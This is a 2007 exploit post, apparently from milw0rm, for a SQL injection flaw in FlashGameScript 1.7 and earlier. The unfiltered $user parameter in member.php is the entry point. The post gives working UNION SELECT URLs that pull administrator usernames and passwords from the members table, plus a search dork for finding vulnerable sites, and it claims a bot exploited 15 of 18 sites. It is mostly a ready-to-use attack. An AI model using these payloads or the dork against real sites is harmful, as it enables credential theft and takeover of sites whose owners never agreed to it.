############################################### ### FlashGameScript <= 1.7 (member.php)($user) SQL-Injection Exploit ############################################### ### Vulnrability Discovered By: Xenduer77 ### ---July 7th, 2007 ############################################### {$user} Is passed straight to the query without being filtered. ############################################### SQL-INJECTION: ############################################### For Version 1.7: ------- http://whatever.com/index.php?func=member&user='+union+select+0,0,0,0,0,0,0,0,0,0,username,password,0,0,0,0,0,user_type+from+members+where+user_type=2/* Prior To 1.7: ------- http://whatever.com/index.php?func=member&user='+union+select+0,0,0,0,0,0,0,0,0,0,username,password,0,0,0,0,user_type+from+members+where+user_type=2/* ###Tested by a bot on 18 sites, 15 were exploited. ############################################### Dork: "Powered by FlashGameScript" ############################################### # milw0rm.com [2007-07-08]